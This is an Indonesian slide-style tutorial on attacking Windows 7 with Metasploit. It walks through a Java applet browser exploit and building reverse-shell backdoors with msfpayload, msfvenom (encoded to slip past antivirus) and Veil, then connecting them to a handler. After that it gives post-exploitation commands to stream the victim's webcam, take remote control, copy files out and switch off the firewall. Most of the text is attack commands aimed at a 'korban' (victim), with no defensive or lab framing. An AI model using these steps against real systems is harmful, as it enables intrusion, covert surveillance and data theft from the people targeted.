1. ZAENAL ABIDIN
Exploit windows
Sebelum melulai exploit
Jalankan service metasploit
- Applications => Kali Linux => System services => Metasploit => Comunity / pro start
Untuk menjalankan Metasploit freamwork
- Applications => Kali linux => Exploitation tools => Metasploit => Metasploit freamwork
Menjalankan metasploit melalui terminal
- bukan terminal ketik msfconsole
Exploit windows mengunakan java applet
- ketik: use exploit/multi/browser/java_jre17_provider_skeleton
Tekan enter
- ketik: set payload java/Meterpreter/reverse_tcp
Tekan enter
- ketik: set lhost (ketik ip komputer yang kamu gunakan)
Tekan enter
- ketik: set srvhost (ketik ip kamputer yang kamu gunakan)
2. ZAENAL ABIDIN
Tekan enter
- ketik: set uripath /
Tekan enter
- exploit tekan enter
Di komputer korban buka browser dan ketik alamat website: http://172.16.204.1:8080/
Alamat website di dapat dari: USING URL: http://172.16.204.1:8080/
Sudah berhasil masuk ke os windows7
Exploit windows menggunakan Backdoor
Banyak cara untuk membuat backdoor
Bisa menggunakan setoolkit, msfpayload, msfvenom, veil dll.
3. ZAENAL ABIDIN
Menggunakan msfpayload
- buka terminal kemudian ketik kode di bawah ini: msfpayload
windows/meterpreter/reverse_tcp lhost=172.16.204.1 lport=4444 x >
/root/JanganDibuka.exe
Ket:
Lhost = ip komputer yang kamu gunakan
Lport = isi dengan port 4444
/root = letak backdoor yang sudah jadi
JanganDibuka = filenema backdoor yang akan di buat
Menggunakan msfvenom
- buka teminal ketik kode di bawah ini:
msfvenom -p windows/meterpreter/reverse_tcp
- o
Ketik di bawah ini untuk membuat backdoor
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 'x00'
lhost=172.16.204.1 lport=4444 -f exe>/root/JanganDibuka.exe
Menggunakan veil
Sebelum menggunakan veil
4. ZAENAL ABIDIN
Install dulu tool veil
- buka terminal ketik wget https://github.com/ChrisTruncer/Veil/archive/master.zip
- Kemudian extrak menggunakan perintah unzip master.zip
- install veil: /root/Veil-Evasion-master/setup/setup.sh
Membuat backdoor
- masuk terminal kerik /root/Veil-Evasion-master/Veil-Evasion.py
- ketik use
Ketik 25
6. ZAENAL ABIDIN
Tekan enter
Ketik nama backdoor yang akan dibuat
Ketik 1
Letak backdoor yang suka jadi di : /root/veil-output/compiled/JanganDibuka.exe
Di atas sudah ada beberapa contoh membuat backdoor
Kalau menggunakan backdoor :
- msfpayload = mudah terdeteksi antivirus
7. ZAENAL ABIDIN
- msfvenom = bisa lolos dari antivirus
- veil = bisa lolos dari antivirus
Menggunakan Backdoor
- buka terminal ketik:
Msfconsole
Ketik : use exploit/multi/handler
Tekan enter
Ketik : set payload windows/meterpreter/reverse_tcp
Tekan enter
Ketik : set lhost (ip komputer yang kamu gunakan)
Tekan enter
Ketik : set lport (port nya samakan dengan port backdoor yang kamu telah buat)
Tekan enter
Ketik : exploit
Tekan enter
Copy dan jalankan backdoor di komputer korban
10. ZAENAL ABIDIN
Ketik shell untuk masuk cmd windows7
Ketik exit : keluar dari cmd
Ketik screenshot : sreenshot windows7
Ketik webcam_stream : menjalankan webcam komputer korban
11. ZAENAL ABIDIN
Ketik run vnc : remote komputer korban
Untuk mengambil file dari komputer korban
Ketik download lokasi file korban
Contoh: download c:wallpaper.jpg
12. ZAENAL ABIDIN
Untuk menaruh file ke komputer korban
Ketik upload file yang akan ditaruh di komputer korban
Contoh: upload gambar.jpg c:
Untuk disable firewall windows
Ketik: netsh firewall set opmode disable